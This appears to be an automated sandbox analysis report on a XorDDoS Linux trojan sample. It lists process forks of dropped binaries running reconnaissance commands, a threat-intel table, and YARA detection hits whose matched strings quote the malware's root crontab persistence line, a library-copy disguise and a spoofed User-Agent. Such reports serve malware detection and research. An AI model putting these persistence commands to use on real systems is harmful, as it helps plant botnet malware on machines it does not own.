piqqogcjxo (PID: 6527, Parent: 6526, MD5: c2b293b1339080e35e219828f8c8bfea) Arguments: /usr/bin/piqqogcjxo whoami 6221

piqqogcjxo New Fork (PID: 6533, Parent: 6527)

TmoTjBkSXT.elf New Fork (PID: 6528, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6529, Parent: 6528)

piqqogcjxo (PID: 6529, Parent: 6528, MD5: c2b293b1339080e35e219828f8c8bfea) Arguments: /usr/bin/piqqogcjxo uptime 6221

piqqogcjxo New Fork (PID: 6534, Parent: 6529)

TmoTjBkSXT.elf New Fork (PID: 6537, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6538, Parent: 6537)

mqwsbvfumc (PID: 6538, Parent: 6537, MD5: 0792f5401a7f40274493616ebffe0d5d) Arguments: /usr/bin/mqwsbvfumc bash 6221

mqwsbvfumc New Fork (PID: 6539, Parent: 6538)

TmoTjBkSXT.elf New Fork (PID: 6540, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6541, Parent: 6540)

mqwsbvfumc (PID: 6541, Parent: 6540, MD5: 0792f5401a7f40274493616ebffe0d5d) Arguments: /usr/bin/mqwsbvfumc "netstat -an" 6221

mqwsbvfumc New Fork (PID: 6542, Parent: 6541)

TmoTjBkSXT.elf New Fork (PID: 6543, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6544, Parent: 6543)

mqwsbvfumc (PID: 6544, Parent: 6543, MD5: 0792f5401a7f40274493616ebffe0d5d) Arguments: /usr/bin/mqwsbvfumc bash 6221

mqwsbvfumc New Fork (PID: 6547, Parent: 6544)

TmoTjBkSXT.elf New Fork (PID: 6545, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6546, Parent: 6545)

mqwsbvfumc (PID: 6546, Parent: 6545, MD5: 0792f5401a7f40274493616ebffe0d5d) Arguments: /usr/bin/mqwsbvfumc "ps -ef" 6221

mqwsbvfumc New Fork (PID: 6550, Parent: 6546)

TmoTjBkSXT.elf New Fork (PID: 6548, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6549, Parent: 6548)

mqwsbvfumc (PID: 6549, Parent: 6548, MD5: 0792f5401a7f40274493616ebffe0d5d) Arguments: /usr/bin/mqwsbvfumc gnome-terminal 6221

mqwsbvfumc New Fork (PID: 6551, Parent: 6549)

TmoTjBkSXT.elf New Fork (PID: 6554, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6555, Parent: 6554)

uonpajpwtj (PID: 6555, Parent: 6554, MD5: f19abf6223d329e867a04711c21a6c4a) Arguments: /usr/bin/uonpajpwtj "echo \"find\"" 6221

uonpajpwtj New Fork (PID: 6556, Parent: 6555)

TmoTjBkSXT.elf New Fork (PID: 6557, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6558, Parent: 6557)

uonpajpwtj (PID: 6558, Parent: 6557, MD5: f19abf6223d329e867a04711c21a6c4a) Arguments: /usr/bin/uonpajpwtj "ls -la" 6221

uonpajpwtj New Fork (PID: 6561, Parent: 6558)

TmoTjBkSXT.elf New Fork (PID: 6559, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6560, Parent: 6559)

uonpajpwtj (PID: 6560, Parent: 6559, MD5: f19abf6223d329e867a04711c21a6c4a) Arguments: /usr/bin/uonpajpwtj top 6221

uonpajpwtj New Fork (PID: 6564, Parent: 6560)

TmoTjBkSXT.elf New Fork (PID: 6562, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6563, Parent: 6562)

uonpajpwtj (PID: 6563, Parent: 1860, MD5: f19abf6223d329e867a04711c21a6c4a) Arguments: /usr/bin/uonpajpwtj pwd 6221

uonpajpwtj New Fork (PID: 6567, Parent: 6563)

TmoTjBkSXT.elf New Fork (PID: 6565, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6566, Parent: 6565)

uonpajpwtj (PID: 6566, Parent: 1860, MD5: f19abf6223d329e867a04711c21a6c4a) Arguments: /usr/bin/uonpajpwtj "cat resolv.conf" 6221

uonpajpwtj New Fork (PID: 6568, Parent: 6566)

TmoTjBkSXT.elf New Fork (PID: 6572, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6573, Parent: 6572)

qmlitbamhb (PID: 6573, Parent: 1860, MD5: fe9ddb6239725a55d62d7c0f037cc9b8) Arguments: /usr/bin/qmlitbamhb "route -n" 6221

qmlitbamhb New Fork (PID: 6578, Parent: 6573)

TmoTjBkSXT.elf New Fork (PID: 6574, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6575, Parent: 6574)

qmlitbamhb (PID: 6575, Parent: 1860, MD5: fe9ddb6239725a55d62d7c0f037cc9b8) Arguments: /usr/bin/qmlitbamhb id 6221

qmlitbamhb New Fork (PID: 6583, Parent: 6575)

TmoTjBkSXT.elf New Fork (PID: 6576, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6577, Parent: 6576)

qmlitbamhb (PID: 6577, Parent: 1860, MD5: fe9ddb6239725a55d62d7c0f037cc9b8) Arguments: /usr/bin/qmlitbamhb id 6221

qmlitbamhb New Fork (PID: 6584, Parent: 6577)

TmoTjBkSXT.elf New Fork (PID: 6579, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6580, Parent: 6579)

qmlitbamhb (PID: 6580, Parent: 1860, MD5: fe9ddb6239725a55d62d7c0f037cc9b8) Arguments: /usr/bin/qmlitbamhb gnome-terminal 6221

qmlitbamhb New Fork (PID: 6585, Parent: 6580)

TmoTjBkSXT.elf New Fork (PID: 6581, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6582, Parent: 6581)

qmlitbamhb (PID: 6582, Parent: 1860, MD5: fe9ddb6239725a55d62d7c0f037cc9b8) Arguments: /usr/bin/qmlitbamhb ls 6221

qmlitbamhb New Fork (PID: 6586, Parent: 6582)

TmoTjBkSXT.elf New Fork (PID: 6589, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6590, Parent: 6589)

uoqnuhuwzn (PID: 6590, Parent: 6589, MD5: ae0ea7bc222f5642f9cf5e9901cd1e24) Arguments: /usr/bin/uoqnuhuwzn who 6221

uoqnuhuwzn New Fork (PID: 6595, Parent: 6590)

TmoTjBkSXT.elf New Fork (PID: 6591, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6592, Parent: 6591)

uoqnuhuwzn (PID: 6592, Parent: 1860, MD5: ae0ea7bc222f5642f9cf5e9901cd1e24) Arguments: /usr/bin/uoqnuhuwzn whoami 6221

uoqnuhuwzn New Fork (PID: 6598, Parent: 6592)

TmoTjBkSXT.elf New Fork (PID: 6593, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6594, Parent: 6593)

uoqnuhuwzn (PID: 6594, Parent: 6593, MD5: ae0ea7bc222f5642f9cf5e9901cd1e24) Arguments: /usr/bin/uoqnuhuwzn "echo \"find\"" 6221

uoqnuhuwzn New Fork (PID: 6601, Parent: 6594)

TmoTjBkSXT.elf New Fork (PID: 6596, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6597, Parent: 6596)

uoqnuhuwzn (PID: 6597, Parent: 1860, MD5: ae0ea7bc222f5642f9cf5e9901cd1e24) Arguments: /usr/bin/uoqnuhuwzn who 6221

uoqnuhuwzn New Fork (PID: 6602, Parent: 6597)

TmoTjBkSXT.elf New Fork (PID: 6599, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6600, Parent: 6599)

uoqnuhuwzn (PID: 6600, Parent: 1860, MD5: ae0ea7bc222f5642f9cf5e9901cd1e24) Arguments: /usr/bin/uoqnuhuwzn "echo \"find\"" 6221

uoqnuhuwzn New Fork (PID: 6603, Parent: 6600)

TmoTjBkSXT.elf New Fork (PID: 6606, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6607, Parent: 6606)

pmctuvfdvh (PID: 6607, Parent: 6606, MD5: f792af38713def1b008dd804685aab64) Arguments: /usr/bin/pmctuvfdvh pwd 6221

pmctuvfdvh New Fork (PID: 6612, Parent: 6607)

TmoTjBkSXT.elf New Fork (PID: 6608, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6609, Parent: 6608)

pmctuvfdvh (PID: 6609, Parent: 1860, MD5: f792af38713def1b008dd804685aab64) Arguments: /usr/bin/pmctuvfdvh gnome-terminal 6221

pmctuvfdvh New Fork (PID: 6617, Parent: 6609)

TmoTjBkSXT.elf New Fork (PID: 6610, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6611, Parent: 6610)

pmctuvfdvh (PID: 6611, Parent: 1860, MD5: f792af38713def1b008dd804685aab64) Arguments: /usr/bin/pmctuvfdvh bash 6221

pmctuvfdvh New Fork (PID: 6618, Parent: 6611)

TmoTjBkSXT.elf New Fork (PID: 6613, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6614, Parent: 6613)

pmctuvfdvh (PID: 6614, Parent: 1860, MD5: f792af38713def1b008dd804685aab64) Arguments: /usr/bin/pmctuvfdvh whoami 6221

pmctuvfdvh New Fork (PID: 6619, Parent: 6614)

TmoTjBkSXT.elf New Fork (PID: 6615, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6616, Parent: 6615)

pmctuvfdvh (PID: 6616, Parent: 1860, MD5: f792af38713def1b008dd804685aab64) Arguments: /usr/bin/pmctuvfdvh "cd /etc" 6221

pmctuvfdvh New Fork (PID: 6620, Parent: 6616)

TmoTjBkSXT.elf New Fork (PID: 6626, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6627, Parent: 6626)

snvjsgswbz (PID: 6627, Parent: 6626, MD5: 3039fda2ca3bd65a0352297cd8ebbaf2) Arguments: /usr/bin/snvjsgswbz "ps -ef" 6221

snvjsgswbz New Fork (PID: 6632, Parent: 6627)

TmoTjBkSXT.elf New Fork (PID: 6628, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6629, Parent: 6628)

snvjsgswbz (PID: 6629, Parent: 1860, MD5: 3039fda2ca3bd65a0352297cd8ebbaf2) Arguments: /usr/bin/snvjsgswbz "cd /etc" 6221

snvjsgswbz New Fork (PID: 6636, Parent: 6629)

TmoTjBkSXT.elf New Fork (PID: 6630, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6631, Parent: 6630)

snvjsgswbz (PID: 6631, Parent: 1860, MD5: 3039fda2ca3bd65a0352297cd8ebbaf2) Arguments: /usr/bin/snvjsgswbz "ls -la" 6221

snvjsgswbz New Fork (PID: 6638, Parent: 6631)

TmoTjBkSXT.elf New Fork (PID: 6633, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6634, Parent: 6633)

snvjsgswbz (PID: 6634, Parent: 1860, MD5: 3039fda2ca3bd65a0352297cd8ebbaf2) Arguments: /usr/bin/snvjsgswbz "echo \"find\"" 6221

snvjsgswbz New Fork (PID: 6639, Parent: 6634)

TmoTjBkSXT.elf New Fork (PID: 6635, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6637, Parent: 6635)

snvjsgswbz (PID: 6637, Parent: 1860, MD5: 3039fda2ca3bd65a0352297cd8ebbaf2) Arguments: /usr/bin/snvjsgswbz "cd /etc" 6221

snvjsgswbz New Fork (PID: 6640, Parent: 6637)

TmoTjBkSXT.elf New Fork (PID: 6643, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6644, Parent: 6643)

abhfppzmcz (PID: 6644, Parent: 6643, MD5: 450153e784241ba25921a561496fb6e1) Arguments: /usr/bin/abhfppzmcz whoami 6221

abhfppzmcz New Fork (PID: 6649, Parent: 6644)

TmoTjBkSXT.elf New Fork (PID: 6645, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6646, Parent: 6645)

abhfppzmcz (PID: 6646, Parent: 1860, MD5: 450153e784241ba25921a561496fb6e1) Arguments: /usr/bin/abhfppzmcz ifconfig 6221

abhfppzmcz New Fork (PID: 6652, Parent: 6646)

TmoTjBkSXT.elf New Fork (PID: 6647, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6648, Parent: 6647)

abhfppzmcz (PID: 6648, Parent: 1860, MD5: 450153e784241ba25921a561496fb6e1) Arguments: /usr/bin/abhfppzmcz "echo \"find\"" 6221

abhfppzmcz New Fork (PID: 6655, Parent: 6648)

TmoTjBkSXT.elf New Fork (PID: 6650, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6651, Parent: 6650)

abhfppzmcz (PID: 6651, Parent: 1860, MD5: 450153e784241ba25921a561496fb6e1) Arguments: /usr/bin/abhfppzmcz gnome-terminal 6221

abhfppzmcz New Fork (PID: 6656, Parent: 6651)

TmoTjBkSXT.elf New Fork (PID: 6653, Parent: 6221)

TmoTjBkSXT.elf New Fork (PID: 6654, Parent: 6653)

abhfppzmcz (PID: 6654, Parent: 1860, MD5: 450153e784241ba25921a561496fb6e1) Arguments: /usr/bin/abhfppzmcz "ps -ef" 6221

abhfppzmcz New Fork (PID: 6657, Parent: 6654)

systemd New Fork (PID: 6233, Parent: 6232)

snapd-env-generator (PID: 6233, Parent: 6232, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
TmoTjBkSXT.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
TmoTjBkSXT.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
TmoTjBkSXT.elf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
TmoTjBkSXT.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
TmoTjBkSXT.elf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
TmoTjBkSXT.elf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
TmoTjBkSXT.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/piqqogcjxo	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/piqqogcjxo	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/piqqogcjxo	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/piqqogcjxo	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ucawyxmhdv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ucawyxmhdv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ucawyxmhdv	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ucawyxmhdv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ucawyxmhdv	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ucawyxmhdv	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ucawyxmhdv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mqnheeruxi	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zygafieftp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mqnheeruxi	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zygafieftp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/rfjhcudkoa	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/flfoijfhrh	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zygafieftp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/zygafieftp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/flfoijfhrh	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/flfoijfhrh	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/flfoijfhrh	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/flfoijfhrh	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/flfoijfhrh	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/zygafieftp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/flfoijfhrh	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mqnheeruxi	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/mqnheeruxi	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mqnheeruxi	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/mqnheeruxi	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/zygafieftp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/rfjhcudkoa	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zygafieftp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mqnheeruxi	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/rfjhcudkoa	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/rfjhcudkoa	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/rfjhcudkoa	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/rfjhcudkoa	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7cd7:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/rfjhcudkoa	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x866fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8674d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6b030:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6b129:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/ybavzvdbws	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ybavzvdbws	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6b299:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ybavzvdbws	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ybavzvdbws	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x91d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x923a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ybavzvdbws	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
